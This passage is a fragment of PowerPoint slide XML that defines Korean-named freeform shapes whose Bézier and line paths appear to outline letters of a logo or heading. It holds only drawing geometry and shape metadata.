                        <a:pt x="126206" y="250603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="173831" y="109252"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="221456" y="250603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="268224" y="250603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="347662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1" name="자유형: 도형 193">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60675B74-7306-A142-93A5-64D5B24A7F36}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3597600" y="4146034"/>
                  <a:ext cx="219075" cy="247650"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 165164 w 219075"/>
                    <a:gd name="connsiteY0" fmla="*/ 208502 h 247650"/>
                    <a:gd name="connsiteX1" fmla="*/ 134969 w 219075"/>
                    <a:gd name="connsiteY1" fmla="*/ 156115 h 247650"/>
                    <a:gd name="connsiteX2" fmla="*/ 194501 w 219075"/>
                    <a:gd name="connsiteY2" fmla="*/ 77534 h 247650"/>
                    <a:gd name="connsiteX3" fmla="*/ 159544 w 219075"/>
                    <a:gd name="connsiteY3" fmla="*/ 14383 h 247650"/>
                    <a:gd name="connsiteX4" fmla="*/ 107728 w 219075"/>
                    <a:gd name="connsiteY4" fmla="*/ 0 h 247650"/>
                    <a:gd name="connsiteX5" fmla="*/ 0 w 219075"/>
                    <a:gd name="connsiteY5" fmla="*/ 0 h 247650"/>
                    <a:gd name="connsiteX6" fmla="*/ 0 w 219075"/>
                    <a:gd name="connsiteY6" fmla="*/ 250603 h 247650"/>
                    <a:gd name="connsiteX7" fmla="*/ 50768 w 219075"/>
                    <a:gd name="connsiteY7" fmla="*/ 250603 h 247650"/>
                    <a:gd name="connsiteX8" fmla="*/ 50768 w 219075"/>
                    <a:gd name="connsiteY8" fmla="*/ 156115 h 247650"/>
                    <a:gd name="connsiteX9" fmla="*/ 92011 w 219075"/>
                    <a:gd name="connsiteY9" fmla="*/ 156115 h 247650"/>
                    <a:gd name="connsiteX10" fmla="*/ 164021 w 219075"/>
                    <a:gd name="connsiteY10" fmla="*/ 250603 h 247650"/>
                    <a:gd name="connsiteX11" fmla="*/ 223456 w 219075"/>
                    <a:gd name="connsiteY11" fmla="*/ 232219 h 247650"/>
                    <a:gd name="connsiteX12" fmla="*/ 200406 w 219075"/>
                    <a:gd name="connsiteY12" fmla="*/ 200882 h 247650"/>
                    <a:gd name="connsiteX13" fmla="*/ 165164 w 219075"/>
                    <a:gd name="connsiteY13" fmla="*/ 208502 h 247650"/>
                    <a:gd name="connsiteX14" fmla="*/ 114776 w 219075"/>
                    <a:gd name="connsiteY14" fmla="*/ 118396 h 247650"/>
                    <a:gd name="connsiteX15" fmla="*/ 49911 w 219075"/>
                    <a:gd name="connsiteY15" fmla="*/ 118396 h 247650"/>
                    <a:gd name="connsiteX16" fmla="*/ 49911 w 219075"/>
                    <a:gd name="connsiteY16" fmla="*/ 42196 h 247650"/>
                    <a:gd name="connsiteX17" fmla="*/ 111919 w 219075"/>
                    <a:gd name="connsiteY17" fmla="*/ 42196 h 247650"/>
                    <a:gd name="connsiteX18" fmla="*/ 143351 w 219075"/>
                    <a:gd name="connsiteY18" fmla="*/ 80296 h 247650"/>
                    <a:gd name="connsiteX19" fmla="*/ 114776 w 219075"/>
                    <a:gd name="connsiteY19" fmla="*/ 118396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219075" h="247650">
                      <a:moveTo>
                        <a:pt x="165164" y="208502"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="135255" y="197930"/>
                        <a:pt x="134969" y="156115"/>
                        <a:pt x="134969" y="156115"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="134969" y="156115"/>
                        <a:pt x="194501" y="142589"/>
                        <a:pt x="194501" y="77534"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="194501" y="44958"/>
                        <a:pt x="177070" y="25622"/>
                        <a:pt x="159544" y="14383"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="144209" y="4477"/>
                        <a:pt x="126016" y="0"/>
                        <a:pt x="107728" y="0"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="250603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="50768" y="250603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="50768" y="156115"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="92011" y="156115"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="92011" y="156115"/>
                        <a:pt x="99536" y="250603"/>
                        <a:pt x="164021" y="250603"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="212598" y="250603"/>
                        <a:pt x="223456" y="232219"/>
                        <a:pt x="223456" y="232219"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="200406" y="200882"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="200692" y="200787"/>
                        <a:pt x="184690" y="215456"/>
                        <a:pt x="165164" y="208502"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="114776" y="118396"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="49911" y="118396"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="49911" y="42196"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="111919" y="42196"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="111919" y="42196"/>
                        <a:pt x="143351" y="43434"/>
                        <a:pt x="143351" y="80296"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="143351" y="117158"/>
                        <a:pt x="114776" y="118396"/>
                        <a:pt x="114776" y="118396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2" name="자유형: 도형 194">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C59FE502-B4F8-364F-90D9-4821F8371FF4}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3846964" y="4145939"/>
                  <a:ext cx="219075" cy="247650"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 128683 w 219075"/>
                    <a:gd name="connsiteY0" fmla="*/ 6477 h 247650"/>
                    <a:gd name="connsiteX1" fmla="*/ 92297 w 219075"/>
                    <a:gd name="connsiteY1" fmla="*/ 0 h 247650"/>
                    <a:gd name="connsiteX2" fmla="*/ 0 w 219075"/>
                    <a:gd name="connsiteY2" fmla="*/ 0 h 247650"/>
                    <a:gd name="connsiteX3" fmla="*/ 0 w 219075"/>
                    <a:gd name="connsiteY3" fmla="*/ 250603 h 247650"/>
                    <a:gd name="connsiteX4" fmla="*/ 77343 w 219075"/>
                    <a:gd name="connsiteY4" fmla="*/ 250603 h 247650"/>
                    <a:gd name="connsiteX5" fmla="*/ 172784 w 219075"/>
                    <a:gd name="connsiteY5" fmla="*/ 221551 h 247650"/>
                    <a:gd name="connsiteX6" fmla="*/ 225076 w 219075"/>
                    <a:gd name="connsiteY6" fmla="*/ 125349 h 247650"/>
                    <a:gd name="connsiteX7" fmla="*/ 128683 w 219075"/>
                    <a:gd name="connsiteY7" fmla="*/ 6477 h 247650"/>
                    <a:gd name="connsiteX8" fmla="*/ 86868 w 219075"/>
                    <a:gd name="connsiteY8" fmla="*/ 213741 h 247650"/>
                    <a:gd name="connsiteX9" fmla="*/ 49911 w 219075"/>
                    <a:gd name="connsiteY9" fmla="*/ 213741 h 247650"/>
                    <a:gd name="connsiteX10" fmla="*/ 49911 w 219075"/>
                    <a:gd name="connsiteY10" fmla="*/ 42291 h 247650"/>
                    <a:gd name="connsiteX11" fmla="*/ 85154 w 219075"/>
                    <a:gd name="connsiteY11" fmla="*/ 42291 h 247650"/>
                    <a:gd name="connsiteX12" fmla="*/ 111824 w 219075"/>
                    <a:gd name="connsiteY12" fmla="*/ 46863 h 247650"/>
                    <a:gd name="connsiteX13" fmla="*/ 173069 w 219075"/>
                    <a:gd name="connsiteY13" fmla="*/ 128016 h 247650"/>
                    <a:gd name="connsiteX14" fmla="*/ 130778 w 219075"/>
                    <a:gd name="connsiteY14" fmla="*/ 200597 h 247650"/>
                    <a:gd name="connsiteX15" fmla="*/ 86868 w 219075"/>
                    <a:gd name="connsiteY15" fmla="*/ 213741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219075" h="247650">
                      <a:moveTo>
                        <a:pt x="128683" y="6477"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="116967" y="2191"/>
                        <a:pt x="104680" y="0"/>
                        <a:pt x="92297" y="0"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="250603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="77343" y="250603"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="111347" y="250603"/>
                        <a:pt x="144971" y="241078"/>
                        <a:pt x="172784" y="221551"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="199834" y="202406"/>
                        <a:pt x="225076" y="172117"/>
                        <a:pt x="225076" y="125349"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="224980" y="51911"/>
                        <a:pt x="162496" y="18955"/>
                        <a:pt x="128683" y="6477"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="86868" y="213741"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="49911" y="213741"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="49911" y="42291"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="85154" y="42291"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="94202" y="42291"/>
                        <a:pt x="103346" y="43625"/>
                        <a:pt x="111824" y="46863"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="132493" y="54578"/>
                        <a:pt x="173069" y="75057"/>
                        <a:pt x="173069" y="128016"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="173069" y="167640"/>
                        <a:pt x="147161" y="189071"/>
                        <a:pt x="130778" y="200597"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="118110" y="209550"/>
                        <a:pt x="102584" y="213741"/>
                        <a:pt x="86868" y="213741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3" name="자유형: 도형 195">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51287F1A-03A9-804E-9293-4FC7E176417F}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4085851" y="4146034"/>
                  <a:ext cx="180975" cy="247650"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 100013 w 180975"/>
                    <a:gd name="connsiteY0" fmla="*/ 103727 h 247650"/>
                    <a:gd name="connsiteX1" fmla="*/ 63532 w 180975"/>
                    <a:gd name="connsiteY1" fmla="*/ 60674 h 247650"/>
                    <a:gd name="connsiteX2" fmla="*/ 140779 w 180975"/>
                    <a:gd name="connsiteY2" fmla="*/ 70199 h 247650"/>
                    <a:gd name="connsiteX3" fmla="*/ 180975 w 180975"/>
                    <a:gd name="connsiteY3" fmla="*/ 46577 h 247650"/>
                    <a:gd name="connsiteX4" fmla="*/ 96869 w 180975"/>
                    <a:gd name="connsiteY4" fmla="*/ 0 h 247650"/>
                    <a:gd name="connsiteX5" fmla="*/ 13525 w 180975"/>
                    <a:gd name="connsiteY5" fmla="*/ 77534 h 247650"/>
                    <a:gd name="connsiteX6" fmla="*/ 97250 w 180975"/>
                    <a:gd name="connsiteY6" fmla="*/ 148971 h 247650"/>
                    <a:gd name="connsiteX7" fmla="*/ 134969 w 180975"/>
                    <a:gd name="connsiteY7" fmla="*/ 187833 h 247650"/>
                    <a:gd name="connsiteX8" fmla="*/ 97250 w 180975"/>
                    <a:gd name="connsiteY8" fmla="*/ 209264 h 247650"/>
                    <a:gd name="connsiteX9" fmla="*/ 41243 w 180975"/>
                    <a:gd name="connsiteY9" fmla="*/ 175165 h 247650"/>
                    <a:gd name="connsiteX10" fmla="*/ 0 w 180975"/>
                    <a:gd name="connsiteY10" fmla="*/ 187833 h 247650"/>
                    <a:gd name="connsiteX11" fmla="*/ 101632 w 180975"/>
                    <a:gd name="connsiteY11" fmla="*/ 250508 h 247650"/>
                    <a:gd name="connsiteX12" fmla="*/ 186595 w 180975"/>
                    <a:gd name="connsiteY12" fmla="*/ 173546 h 247650"/>
                    <a:gd name="connsiteX13" fmla="*/ 100013 w 180975"/>
                    <a:gd name="connsiteY13" fmla="*/ 103727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80975" h="247650">
                      <a:moveTo>
                        <a:pt x="100013" y="103727"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="66484" y="103727"/>
                        <a:pt x="59722" y="73724"/>
                        <a:pt x="63532" y="60674"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="68866" y="42196"/>
                        <a:pt x="115348" y="22574"/>
                        <a:pt x="140779" y="70199"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="180975" y="46577"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="180975" y="46577"/>
                        <a:pt x="165925" y="0"/>
                        <a:pt x="96869" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21431" y="0"/>
                        <a:pt x="13525" y="48578"/>
                        <a:pt x="13525" y="77534"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13525" y="106489"/>
                        <a:pt x="43720" y="148971"/>
                        <a:pt x="97250" y="148971"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138493" y="148971"/>
                        <a:pt x="134969" y="187833"/>
                        <a:pt x="134969" y="187833"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="134969" y="187833"/>
                        <a:pt x="132588" y="209264"/>
                        <a:pt x="97250" y="209264"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="53150" y="209264"/>
                        <a:pt x="41243" y="175165"/>
                        <a:pt x="41243" y="175165"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="187833"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="187833"/>
                        <a:pt x="10287" y="250508"/>
                        <a:pt x="101632" y="250508"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="184404" y="250508"/>
                        <a:pt x="187452" y="189929"/>
                        <a:pt x="186595" y="173546"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="185547" y="156115"/>
                        <a:pt x="168307" y="103727"/>
                        <a:pt x="100013" y="103727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4" name="자유형: 도형 196">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B769357-CA2E-A041-8732-0FDDEB986C1F}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3322899" y="4146034"/>
                  <a:ext cx="247650" cy="247650"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 99155 w 247650"/>
                    <a:gd name="connsiteY0" fmla="*/ 0 h 247650"/>
                    <a:gd name="connsiteX1" fmla="*/ 0 w 247650"/>
                    <a:gd name="connsiteY1" fmla="*/ 250603 h 247650"/>
                    <a:gd name="connsiteX2" fmla="*/ 60293 w 247650"/>
                    <a:gd name="connsiteY2" fmla="*/ 250603 h 247650"/>
                    <a:gd name="connsiteX3" fmla="*/ 77724 w 247650"/>
                    <a:gd name="connsiteY3" fmla="*/ 206978 h 247650"/>
                    <a:gd name="connsiteX4" fmla="*/ 178498 w 247650"/>
                    <a:gd name="connsiteY4" fmla="*/ 206978 h 247650"/>
                    <a:gd name="connsiteX5" fmla="*/ 198311 w 247650"/>
                    <a:gd name="connsiteY5" fmla="*/ 250603 h 247650"/>
                    <a:gd name="connsiteX6" fmla="*/ 253079 w 247650"/>
                    <a:gd name="connsiteY6" fmla="*/ 250603 h 247650"/>
                    <a:gd name="connsiteX7" fmla="*/ 154686 w 247650"/>
                    <a:gd name="connsiteY7" fmla="*/ 0 h 247650"/>
                    <a:gd name="connsiteX8" fmla="*/ 99155 w 247650"/>
                    <a:gd name="connsiteY8" fmla="*/ 0 h 247650"/>
                    <a:gd name="connsiteX9" fmla="*/ 90488 w 247650"/>
                    <a:gd name="connsiteY9" fmla="*/ 163259 h 247650"/>
                    <a:gd name="connsiteX10" fmla="*/ 128206 w 247650"/>
                    <a:gd name="connsiteY10" fmla="*/ 60103 h 247650"/>
                    <a:gd name="connsiteX11" fmla="*/ 165925 w 247650"/>
                    <a:gd name="connsiteY11" fmla="*/ 163259 h 247650"/>
                    <a:gd name="connsiteX12" fmla="*/ 90488 w 247650"/>
                    <a:gd name="connsiteY12" fmla="*/ 163259 h 247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7650" h="247650">
                      <a:moveTo>
                        <a:pt x="99155" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="250603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="60293" y="250603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="77724" y="206978"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="178498" y="206978"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="198311" y="250603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="253079" y="250603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="154686" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="99155" y="0"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="90488" y="163259"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="128206" y="60103"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="165925" y="163259"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="90488" y="163259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 dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="285" name="자유형: 도형 197">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FA2DCBA-40CB-604C-B602-BE19A587176B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2782450" y="3938008"/>
                  <a:ext cx="95250" cy="123825"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 39624 w 95250"/>
                    <a:gd name="connsiteY0" fmla="*/ 20384 h 123825"/>
                    <a:gd name="connsiteX1" fmla="*/ 0 w 95250"/>
                    <a:gd name="connsiteY1" fmla="*/ 20384 h 123825"/>
                    <a:gd name="connsiteX2" fmla="*/ 0 w 95250"/>
                    <a:gd name="connsiteY2" fmla="*/ 0 h 123825"/>
                    <a:gd name="connsiteX3" fmla="*/ 101251 w 95250"/>
                    <a:gd name="connsiteY3" fmla="*/ 0 h 123825"/>
                    <a:gd name="connsiteX4" fmla="*/ 101251 w 95250"/>
                    <a:gd name="connsiteY4" fmla="*/ 20288 h 123825"/>
                    <a:gd name="connsiteX5" fmla="*/ 61627 w 95250"/>
                    <a:gd name="connsiteY5" fmla="*/ 20288 h 123825"/>
                    <a:gd name="connsiteX6" fmla="*/ 61627 w 95250"/>
                    <a:gd name="connsiteY6" fmla="*/ 124778 h 123825"/>
                    <a:gd name="connsiteX7" fmla="*/ 39529 w 95250"/>
                    <a:gd name="connsiteY7" fmla="*/ 124778 h 123825"/>
                    <a:gd name="connsiteX8" fmla="*/ 39529 w 95250"/>
                    <a:gd name="connsiteY8" fmla="*/ 20384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250" h="123825">
                      <a:moveTo>
                        <a:pt x="39624" y="20384"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="20384"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="101251" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="101251" y="20288"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="61627" y="20288"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="61627" y="124778"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="39529" y="124778"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="39529" y="20384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6" name="자유형: 도형 344">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF17FA76-232B-C540-8CB1-4921E7DA2DA0}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2905133" y="3938008"/>
                  <a:ext cx="104775" cy="123825"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 53054 w 104775"/>
                    <a:gd name="connsiteY0" fmla="*/ 126778 h 123825"/>
                    <a:gd name="connsiteX1" fmla="*/ 31147 w 104775"/>
                    <a:gd name="connsiteY1" fmla="*/ 123254 h 123825"/>
                    <a:gd name="connsiteX2" fmla="*/ 14383 w 104775"/>
                    <a:gd name="connsiteY2" fmla="*/ 112776 h 123825"/>
                    <a:gd name="connsiteX3" fmla="*/ 3715 w 104775"/>
                    <a:gd name="connsiteY3" fmla="*/ 95536 h 123825"/>
                    <a:gd name="connsiteX4" fmla="*/ 0 w 104775"/>
                    <a:gd name="connsiteY4" fmla="*/ 71723 h 123825"/>
                    <a:gd name="connsiteX5" fmla="*/ 0 w 104775"/>
                    <a:gd name="connsiteY5" fmla="*/ 0 h 123825"/>
                    <a:gd name="connsiteX6" fmla="*/ 21717 w 104775"/>
                    <a:gd name="connsiteY6" fmla="*/ 0 h 123825"/>
                    <a:gd name="connsiteX7" fmla="*/ 21717 w 104775"/>
                    <a:gd name="connsiteY7" fmla="*/ 70961 h 123825"/>
                    <a:gd name="connsiteX8" fmla="*/ 30099 w 104775"/>
                    <a:gd name="connsiteY8" fmla="*/ 97536 h 123825"/>
                    <a:gd name="connsiteX9" fmla="*/ 53435 w 104775"/>
                    <a:gd name="connsiteY9" fmla="*/ 106585 h 123825"/>
                    <a:gd name="connsiteX10" fmla="*/ 76581 w 104775"/>
                    <a:gd name="connsiteY10" fmla="*/ 97822 h 123825"/>
                    <a:gd name="connsiteX11" fmla="*/ 84963 w 104775"/>
                    <a:gd name="connsiteY11" fmla="*/ 71819 h 123825"/>
                    <a:gd name="connsiteX12" fmla="*/ 84963 w 104775"/>
                    <a:gd name="connsiteY12" fmla="*/ 0 h 123825"/>
                    <a:gd name="connsiteX13" fmla="*/ 106680 w 104775"/>
                    <a:gd name="connsiteY13" fmla="*/ 0 h 123825"/>
                    <a:gd name="connsiteX14" fmla="*/ 106680 w 104775"/>
                    <a:gd name="connsiteY14" fmla="*/ 70771 h 123825"/>
                    <a:gd name="connsiteX15" fmla="*/ 102870 w 104775"/>
                    <a:gd name="connsiteY15" fmla="*/ 95155 h 123825"/>
                    <a:gd name="connsiteX16" fmla="*/ 92107 w 104775"/>
                    <a:gd name="connsiteY16" fmla="*/ 112681 h 123825"/>
                    <a:gd name="connsiteX17" fmla="*/ 75248 w 104775"/>
                    <a:gd name="connsiteY17" fmla="*/ 123158 h 123825"/>
                    <a:gd name="connsiteX18" fmla="*/ 53054 w 104775"/>
                    <a:gd name="connsiteY18" fmla="*/ 126778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04775" h="123825">
                      <a:moveTo>
                        <a:pt x="53054" y="126778"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="44958" y="126778"/>
                        <a:pt x="37624" y="125635"/>
                        <a:pt x="31147" y="123254"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="24574" y="120968"/>
                        <a:pt x="19050" y="117443"/>
                        <a:pt x="14383" y="112776"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9716" y="108109"/>
                        <a:pt x="6191" y="102394"/>
                        <a:pt x="3715" y="95536"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1238" y="88678"/>
                        <a:pt x="0" y="80772"/>
                        <a:pt x="0" y="71723"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21717" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21717" y="70961"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="21717" y="82582"/>
                        <a:pt x="24479" y="91440"/>
                        <a:pt x="30099" y="97536"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="35719" y="103632"/>
                        <a:pt x="43529" y="106585"/>
                        <a:pt x="53435" y="106585"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="63246" y="106585"/>
                        <a:pt x="70961" y="103632"/>
                        <a:pt x="76581" y="97822"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="82201" y="92012"/>
                        <a:pt x="84963" y="83344"/>
                        <a:pt x="84963" y="71819"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="84963" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="106680" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="106680" y="70771"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="106680" y="80010"/>
                        <a:pt x="105442" y="88202"/>
                        <a:pt x="102870" y="95155"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="100298" y="102203"/>
                        <a:pt x="96679" y="108014"/>
                        <a:pt x="92107" y="112681"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="87440" y="117348"/>
                        <a:pt x="81820" y="120872"/>
                        <a:pt x="75248" y="123158"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="68580" y="125635"/>
                        <a:pt x="61246" y="126778"/>
                        <a:pt x="53054" y="126778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7" name="자유형: 도형 345">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CB56109-1520-4449-B35F-D116A05C9DA6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3035911" y="3997635"/>
                  <a:ext cx="47625" cy="19050"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 0 w 47625"/>
                    <a:gd name="connsiteY0" fmla="*/ 0 h 19050"/>
                    <a:gd name="connsiteX1" fmla="*/ 52768 w 47625"/>
                    <a:gd name="connsiteY1" fmla="*/ 0 h 19050"/>
                    <a:gd name="connsiteX2" fmla="*/ 52768 w 47625"/>
                    <a:gd name="connsiteY2" fmla="*/ 21241 h 19050"/>
                    <a:gd name="connsiteX3" fmla="*/ 0 w 47625"/>
                    <a:gd name="connsiteY3" fmla="*/ 21241 h 19050"/>
                    <a:gd name="connsiteX4" fmla="*/ 0 w 47625"/>
                    <a:gd name="connsiteY4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7625" h="19050">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="52768" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="52768" y="21241"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="2124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8" name="자유형: 도형 346">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF874A0C-1982-344F-BAF8-B96131E95D6F}"/>
                    </a:ext>
